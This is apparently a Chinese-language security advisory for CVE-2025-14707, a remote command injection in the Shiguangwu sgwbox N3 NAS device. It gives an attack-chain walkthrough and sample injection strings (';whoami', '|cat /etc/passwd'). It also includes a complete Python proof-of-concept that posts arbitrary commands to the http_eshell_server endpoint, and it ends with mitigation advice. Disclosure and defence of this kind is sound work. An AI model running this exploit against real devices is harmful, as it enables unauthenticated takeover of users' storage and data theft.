CVE-2025-14707: Shiguangwu sgwbox N3 远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2025-14707

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Shiguangwu sgwbox N3

漏洞概述

CVE-2025-14707是Shiguangwu（时光物联）sgwbox N3 NAS设备中发现的一个严重安全漏洞。该漏洞存在于设备的DOCKER功能组件中，具体位于/usr/sbin/http_eshell_server文件。攻击者可以通过操纵params参数实现远程命令注入。由于该漏洞的CVSS评分高达9.8，属于严重级别，攻击者无需任何认证即可远程利用此漏洞，成功利用后可获得设备的完全控制权，包括执行任意系统命令、窃取敏感数据、植入后门等。该漏洞已被公开披露，厂商在收到安全通知后未做出任何回应。鉴于该漏洞影响的是网络存储设备，一旦被攻击者利用，可能导致大量用户数据的泄露和篡改，风险极高。建议所有使用受影响版本设备的用户立即采取防御措施。

技术细节

该漏洞为典型的命令注入（Command Injection）漏洞，位于sgwbox N3设备的DOCKER功能模块中的http_eshell_server组件。漏洞产生的根本原因是在处理用户输入的params参数时，未对特殊字符进行充分的过滤和转义就直接拼接到系统命令中执行。攻击者可以通过构造包含分号、管道符、反引号等特殊字符的payload来实现命令注入。例如，通过在params参数中注入如';whoami'或'|cat /etc/passwd'等命令，攻击者可以在服务器上执行任意系统命令。由于该服务以root权限运行，攻击者成功利用后将获得最高权限。由于该漏洞可通过网络远程利用且无需认证，攻击者可以在无需任何前置条件的情况下直接发起攻击。攻击者通常会利用该漏洞下载并执行恶意脚本，建立持久化后门，进而渗透内网其他系统。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为Shiguangwu sgwbox N3 NAS，确认设备运行在公网或内网中，并探测目标服务端口

STEP 2

步骤2: 构造恶意请求

攻击者构造包含命令注入payload的HTTP POST请求，将恶意命令通过params参数注入到http_eshell_server组件

STEP 3

步骤3: 命令执行

服务器端未对params参数进行过滤，将用户输入拼接到系统命令中执行，攻击者注入的命令以服务器权限运行

STEP 4

步骤4: 建立持久化

攻击者利用命令执行漏洞下载恶意脚本、创建后门账户或植入webshell，实现持久化控制

STEP 5

步骤5: 横向移动

攻击者以NAS设备为跳板，利用内网环境进一步渗透其他关键系统，窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14707 PoC - Shiguangwu sgwbox N3 Command Injection
# Affected: sgwbox N3 2.0.25
# Component: /usr/sbin/http_eshell_server (DOCKER Feature)

import requests
import sys
import argparse

def exploit(target_ip, target_port=8080, cmd='whoami'):
    """
    Exploit CVE-2025-14707 by injecting commands via params argument
    """
    url = f"http://{target_ip}:{target_port}/cgi-bin/http_eshell_server"
    
    # Payload construction - inject command via params parameter
    # Using semicolon to chain commands
    payload = f";{cmd}"
    
    data = {
        'params': payload,
        'action': 'exec'
    }
    
    try:
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Executing command: {cmd}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body:\n{response.text}")
        
        return response.text
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-14707 Exploit')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=8080, help='Target port')
    parser.add_argument('-c', '--cmd', default='whoami', help='Command to execute')
    
    args = parser.parse_args()
    
    exploit(args.target, args.port, args.cmd)

if __name__ == '__main__':
    main()

影响范围

Shiguangwu sgwbox N3 2.0.25

防御指南

临时缓解措施

由于该漏洞可能导致设备完全被攻击者控制，在官方补丁发布前，建议采取以下临时缓解措施：1）立即将设备从公网断开，限制为内网访问；2）通过网络ACL或防火墙规则，禁止未经授权的访问DOCKER功能端口；3）监控设备日志和网络流量，及时发现异常行为；4）如果业务允许，考虑暂时关闭DOCKER功能；5）加强网络隔离，防止漏洞被利用后进一步渗透内网。建议持续关注厂商公告，等待官方安全更新发布。